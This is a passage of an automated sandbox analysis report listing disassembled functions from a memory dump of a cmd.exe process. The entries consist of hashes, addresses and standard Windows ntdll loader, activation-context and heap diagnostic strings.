                                                                        • Instruction Fuzzy Hash: B9A24874A056298FDB78DF5ACD887A9B7B5AF89304F1442E9D809A7290DB709ED1CF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: 10d62a84c3127ce75a7301b9d02df441b413e471dbc2cae58737b6234fee2b44
                                                                        • Instruction ID: efbebc43bc4f884599b510833e01c8b7d8e12a5fdd86bcb6b8db56b2e6880c8a
                                                                        • Opcode Fuzzy Hash: 10d62a84c3127ce75a7301b9d02df441b413e471dbc2cae58737b6234fee2b44
                                                                        • Instruction Fuzzy Hash: E8912A34B01714AFDB28EF15E884BAEB7B5EF4E754F1C0168E5106F281DB749881CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03159A11, 03159A3A
                                                                        • LdrpInitShimEngine, xrefs: 031599F4, 03159A07, 03159A30
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 03159A2A
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 03159A01
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 031599ED
                                                                        • apphelp.dll, xrefs: 030F6496
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-204845295
                                                                        • Opcode ID: c6193322a10dc8140216b733047089743195b2d12b195efaeaa1c5a9e246a395
                                                                        • Instruction ID: 65e50811e4adfe3fc2d1e986053e266bd58dad313f3508c538ad336526f90f83
                                                                        • Opcode Fuzzy Hash: c6193322a10dc8140216b733047089743195b2d12b195efaeaa1c5a9e246a395
                                                                        • Instruction Fuzzy Hash: 5C51A075209304DFE324EF24D841BABB7E8EF88B44F044919F9A59B151DB31E944CBA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03132674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 03172160, 0317219A, 031721BA
                                                                        • SXS: %s() passed the empty activation context, xrefs: 03172165
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0317219F
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03172180
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03172178
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 031721BF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: 54631dcbf633c731448b6c73f1b676c0cfdf8aad4483c8e202431a2e5580ddc1
                                                                        • Instruction ID: a744b96c05b06bc12597bc538c5ebb008a27882422f032730e1b168252ea8e2a
                                                                        • Opcode Fuzzy Hash: 54631dcbf633c731448b6c73f1b676c0cfdf8aad4483c8e202431a2e5580ddc1
                                                                        • Instruction Fuzzy Hash: B531E436F413147FE721EA95CC41F6EB779EBAEA90F090459BA04AB241D370DA43C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0313C6C3
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 031781E5
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 03178181, 031781F5
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 03178170
                                                                        • LdrpInitializeImportRedirection, xrefs: 03178177, 031781EB
                                                                        • LdrpInitializeProcess, xrefs: 0313C6C4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 562fdd9e657187a72d32cbc9d1de46c983fe8c6402edaff9eb674ffb775cec83
                                                                        • Instruction ID: cb284048d609a4051208ccf7859f5b33097ec3d61617f4da914ac0673d6ec65c
                                                                        • Opcode Fuzzy Hash: 562fdd9e657187a72d32cbc9d1de46c983fe8c6402edaff9eb674ffb775cec83
                                                                        • Instruction Fuzzy Hash: 803115B57447459FC214EF28D84AE1ABBE4EF8CB10F080958F890AF391DB20EC04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0314096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03142DF0: LdrInitializeThunk.NTDLL ref: 03142DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03140D74
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: 877adf21f67a9021090585d50878673a77b7b33421a6d6b73ea214fff9d175f0
                                                                        • Instruction ID: 4cc09b6320ef564f0c358be456d8e0f5781936889f00c22a05762e30b7b0eefd
                                                                        • Opcode Fuzzy Hash: 877adf21f67a9021090585d50878673a77b7b33421a6d6b73ea214fff9d175f0
                                                                        • Instruction Fuzzy Hash: 0F425C75900715DFDB24CF25C880BAAB7F5FF48314F1845A9E989EB241E770AA85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: 60e1fc11d22f709bd065fb3a17c3035d10ee10d7ad6d76aaf9df091a1e620769
                                                                        • Instruction ID: 5fb961ae8e2cf01baf425082edaed3c5651c775bfee327b826a59ef448eea474
                                                                        • Opcode Fuzzy Hash: 60e1fc11d22f709bd065fb3a17c3035d10ee10d7ad6d76aaf9df091a1e620769
                                                                        • Instruction Fuzzy Hash: E7C18D79108382CFC715CF58C040B6AB7F4BF88704F088969F995CB291E7B4D98ACB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03138402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03138421
                                                                        • @, xrefs: 03138591
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0313855E
                                                                        • LdrpInitializeProcess, xrefs: 03138422
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: 56936b51c9ba11d5a1269594e8cdad6cf4dd18f75bce5d855f13422ee3d4223b
                                                                        • Instruction ID: fbaba059a942b3bf3787db18a405483ef6ef16ea99e6dbeaa43e16a5c28855f2
                                                                        • Opcode Fuzzy Hash: 56936b51c9ba11d5a1269594e8cdad6cf4dd18f75bce5d855f13422ee3d4223b
                                                                        • Instruction Fuzzy Hash: A4918A71648344AFD721EF61CC40FABBAECAF8D644F44092EFA849A150E734D9498B62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() passed the empty activation context, xrefs: 031721DE
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 031721D9, 031722B1
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 031722B6
                                                                        • .Local, xrefs: 031328D8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: f106b9a39fd311cd8c06e7f73bb74d694f1af47885c03487f6259c64d4068c56
                                                                        • Instruction ID: 6f49f7f4aa81a847afd8257792c3055fe5efb06768b6941967ad1991f2b2a769
                                                                        • Opcode Fuzzy Hash: f106b9a39fd311cd8c06e7f73bb74d694f1af47885c03487f6259c64d4068c56
                                                                        • Instruction Fuzzy Hash: 25A18D35A012299FCB24DF64D884BA9B3B5BF5D314F1949EAD808AB251D730DEC2CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03134AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0317342A
                                                                        • RtlDeactivateActivationContext, xrefs: 03173425, 03173432, 03173451
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 03173456
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 03173437
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: 17bf3b2d5640c887f31f11e032afc17f6dfbf513c3a5884adf66c747050dd9f7
                                                                        • Instruction ID: f9b45af199f043b79ba6e572c411a82f0bcb31e62e998a6b1e77aef8c4008466
                                                                        • Opcode Fuzzy Hash: 17bf3b2d5640c887f31f11e032afc17f6dfbf513c3a5884adf66c747050dd9f7
                                                                        • Instruction Fuzzy Hash: 6E6123366047019FC72ACF19C841B2AF3A5EF89B50F1D8969E8669F280CB30E841CBD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 03161028
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 03160FE5
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0316106B
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 031610AE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: 4dfa051b5e0b54e0897f26d7518bba57347baa8a6c1a509af6e4015bb45e97f1
                                                                        • Instruction ID: 79999f54e1a499dcb1b45f5df022e26071ec9ee94e080c567935e27df45a82cc
                                                                        • Opcode Fuzzy Hash: 4dfa051b5e0b54e0897f26d7518bba57347baa8a6c1a509af6e4015bb45e97f1
                                                                        • Instruction Fuzzy Hash: EC71BEB5904344AFCB20EF54C884B9B7BACEF4D7A4F4404A8F9488B286D774D599CBD2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpDynamicShimModule, xrefs: 0316A998
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0316A9A2
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0316A992
                                                                        • apphelp.dll, xrefs: 03122462
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        • Opcode ID: 12229ff720cb681bf1e38b9a8e8aeff48d2761660bb7b7dd5ceaaf6ddfba862d
                                                                        • Instruction ID: 51899a6fc28cbdd94ea4a804ce425cdbf6c4a76385ead250124e8b0c05f9e2fd
                                                                        • Opcode Fuzzy Hash: 12229ff720cb681bf1e38b9a8e8aeff48d2761660bb7b7dd5ceaaf6ddfba862d
                                                                        • Instruction Fuzzy Hash: C2311AB5600341AFD728FF99D841A6EB7B9EF8C700F2A045AE5117B244C7B098D2CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 03113255
                                                                        • HEAP: , xrefs: 03113264
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0311327D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: 95b297f7a111509a65a5b04ae08e9c8bb4e285061a86c7b1ad3bb8133678062e
                                                                        • Instruction ID: 4883d556e5175b687045be84e95f14a72a6cabb316d3e77edbe7a17b29d5306e
                                                                        • Opcode Fuzzy Hash: 95b297f7a111509a65a5b04ae08e9c8bb4e285061a86c7b1ad3bb8133678062e
                                                                        • Instruction Fuzzy Hash: D692CD75A042489FDB29CF68C4407EEBBF1FF4C300F1888A9E859AB255D735A996CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03110770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 02b36ada0e6c5e88d91e05d593f6ac0e062b80fb15ae0b58b8a4dbbacf925504
                                                                        • Instruction ID: 3f7d02c65ae2b7b8e31031e704a59597fb315b3d58053b616ca97b211703eabf
                                                                        • Opcode Fuzzy Hash: 02b36ada0e6c5e88d91e05d593f6ac0e062b80fb15ae0b58b8a4dbbacf925504
                                                                        • Instruction Fuzzy Hash: F2F1A034A00605DFDB19DFA8C894BAAB7F6FF4D304F1841A9E4569B381D734E9A1CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03126962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: $@
                                                                        • API String ID: 2994545307-1077428164
                                                                        • Opcode ID: fe63f1e364a3c5afbf3f01b19e7e6ee46294743c2e9f59c938c9c31cabc33d78
                                                                        • Instruction ID: 3b5b1a9539d02f90129d2f64614e44ff0906ace99c48a001d927b29867191c6b
                                                                        • Opcode Fuzzy Hash: fe63f1e364a3c5afbf3f01b19e7e6ee46294743c2e9f59c938c9c31cabc33d78
                                                                        • Instruction Fuzzy Hash: 90C29F716083519FDB29CF65C880BABBBE5AF8C304F09892DE9C9C7281D774D854CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: 53672dfb265da55dd222eed4cb3a13207129832166afd236a6391d145f8485a0
                                                                        • Instruction ID: ce616c0b7e53d2535872940d44b1099ee19c088d2b66de18be8d929c0079f052
                                                                        • Opcode Fuzzy Hash: 53672dfb265da55dd222eed4cb3a13207129832166afd236a6391d145f8485a0
                                                                        • Instruction Fuzzy Hash: D0A16C75A016299BDB71DF24CC88BEAB7B8EF48700F1401E9E919AB250D7359EC5CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03120BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0316A121
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0316A10F
                                                                        • LdrpCheckModule, xrefs: 0316A117
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        • Opcode ID: ad55030f8b318b098f8b6fb9bf95e95ca0f283a6744b39550a4d8132ca16b838
                                                                        • Instruction ID: 13bcb9b110f0233638f5dfa32e98f51d9173f3bf15333d69352670c6fc01fe7a
                                                                        • Opcode Fuzzy Hash: ad55030f8b318b098f8b6fb9bf95e95ca0f283a6744b39550a4d8132ca16b838
                                                                        • Instruction Fuzzy Hash: 0A71D4B4A00605DFCB18EFA8C980ABEBBF4EF4C304F1945ADD512AB255D735ADA1CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03110A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
